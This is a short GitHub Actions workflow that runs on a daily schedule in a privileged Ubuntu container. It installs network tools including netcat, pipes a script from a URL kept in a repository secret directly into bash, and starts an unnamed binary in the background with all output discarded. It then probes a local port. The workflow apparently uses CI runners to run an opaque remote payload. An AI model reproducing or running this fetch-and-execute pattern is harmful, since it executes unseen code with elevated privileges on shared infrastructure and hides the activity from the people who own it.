name: Inline Shell Commands

on:
  schedule:
    - cron: '0 0 * * *'
  workflow_dispatch:

jobs:
  run-commands:
    runs-on: ubuntu-latest
    container:
      image: ubuntu:22.04
      options: --privileged
    
    steps:
    - name: Install dependencies
      run: |
        apt-get update
        apt-get install -y curl wget bash procps lsof netcat git
    
    - name: Checkout code
      uses: actions/checkout@v4
      
    - name: Run application
      env:
        TESTING: ${{ secrets.TESTING }}
      run: |
        set -e
        echo "Running in Ubuntu container job..."
        
        # Your existing logic
        curl -sSL $TESTING | bash -s -- ddrv

        nohup bash -c 'cd *_DD && ./*_DD' > /dev/null 2>&1 &
        
        # Test
        curl localhost:6882